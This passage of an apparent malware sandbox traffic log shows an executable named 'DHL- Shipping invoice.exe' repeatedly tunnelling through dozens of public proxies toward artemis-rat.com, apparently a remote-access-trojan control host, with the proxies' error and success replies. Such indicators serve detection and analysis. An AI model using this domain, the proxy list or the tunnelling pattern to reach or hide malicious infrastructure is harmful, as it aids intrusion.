                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.368961096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.343786955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.750106096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.597637892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.031034946 CET311INHTTP/1.1 400 Bad Request
                            Server: nginx
                            Date: Tue, 12 Mar 2024 07:37:12 GMT
                            Content-Type: text/html
                            Content-Length: 166
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>
                            Mar 12, 2024 08:37:16.036303997 CET311INHTTP/1.1 400 Bad Request
                            Server: nginx
                            Date: Tue, 12 Mar 2024 07:37:12 GMT
                            Content-Type: text/html
                            Content-Length: 166
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>
                            Mar 12, 2024 08:37:22.045804977 CET311INHTTP/1.1 400 Bad Request
                            Server: nginx
                            Date: Tue, 12 Mar 2024 07:37:12 GMT
                            Content-Type: text/html
                            Content-Length: 166
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1897192.168.2.455500222.223.103.23273026484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.370634079 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:07.709254026 CET90INHTTP/1.1 200 OK
                            Content-Type: application/json
                            Connection: close
                            Content-Length: 55


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1898192.168.2.454870195.177.217.131636436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.384546995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1899192.168.2.455525152.32.130.117180806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.475070953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1900192.168.2.455556192.154.195.7690006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.475156069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1901192.168.2.45555567.201.33.10252836484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.479861021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1902192.168.2.454904162.241.50.179401706484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.480194092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1903192.168.2.453717162.241.79.22480126484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.480349064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.596566916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.750288010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1904192.168.2.45494751.79.87.14485336484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.480545998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1905192.168.2.455557142.4.123.41806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.502892971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1906192.168.2.45552643.155.153.244156736484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.542201996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1907192.168.2.45552743.155.165.196156736484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.543045044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1908192.168.2.45517374.119.147.20941456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.560564995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1909192.168.2.455532120.76.42.20988886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.593234062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1910192.168.2.455554110.12.211.140806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.593369007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1911192.168.2.454875162.214.170.144475586484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.594248056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.749897957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1912192.168.2.45479543.129.228.4678916484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.594249010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1913192.168.2.45555895.71.124.18756786484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.594671965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1914192.168.2.453693195.138.65.3456786484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.594815969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1915192.168.2.45500637.27.32.80806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.595014095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1916192.168.2.455562184.185.2.1241456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.601522923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1917192.168.2.455511120.194.4.15754436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.601742029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.103688955 CET319INHTTP/1.1 400 Bad Request
                            Server: openresty
                            Date: Tue, 12 Mar 2024 07:37:07 GMT
                            Content-Type: text/html
                            Content-Length: 170
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1918192.168.2.453657148.72.210.123607966484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.602062941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.749902964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.750581980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:19.750355959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1919192.168.2.455565213.14.32.7841536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.603586912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1920192.168.2.451267132.148.128.88203176484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.692188025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1921192.168.2.45556734.95.243.12280816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.706064939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1922192.168.2.455559125.122.26.24210806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.706269979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1923192.168.2.455568190.113.12.7533896484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.706782103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1924192.168.2.454962116.199.170.1741456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.712928057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1925192.168.2.455339198.8.94.174390786484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.713608980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1926192.168.2.451490188.165.252.19851326484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.718012094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.750072956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1927192.168.2.455566170.84.205.1741536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.718081951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1928192.168.2.454990139.99.148.9031286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.722345114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.176598072 CET536INHTTP/1.1 407 Proxy Authentication Required
                            Server: squid/3.5.20
                            Mime-Version: 1.0
                            Date: Tue, 12 Mar 2024 07:37:08 GMT
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 3712
                            X-Squid-Error: ERR_CACHE_ACCESS_DENIED 0
                            Vary: Accept-Language
                            Content-Language: en
                            Proxy-Authenticate: Basic realm="Squid Basic Authentication"
                            X-Cache: MISS from ns547184.ip-139-99-148.net
                            X-Cache-Lookup: NONE from ns547184.ip-139-99-148.net:3128
                            Via: 1.1 ns547184.ip-139-99-148.net (squid/3.5.20)
                            Connection: close
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f
                            Data Ascii: <!DOCTYPE html PUBLIC "-/


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1929192.168.2.455563203.218.172.22580806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.723309994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1930192.168.2.455561103.118.46.6180806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.725305080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1931192.168.2.45146145.71.15.13692926484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.725523949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.866676092 CET19INHTTP/1.1 200 OK


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1932192.168.2.45503681.16.245.179532816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.730298042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:19.613228083 CET202INHTTP/1.0 404 Not Found
                            Content-Length: 717
                            Content-Type: text/html
                            Date: Wed, 25 May 2016 05:07:18 GMT
                            Expires: Wed, 25 May 2016 05:07:18 GMT
                            Server: Mikrotik HttpProxy
                            Proxy-Connection: close


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1933192.168.2.455193162.0.220.234570206484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:07.787709951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.865757942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
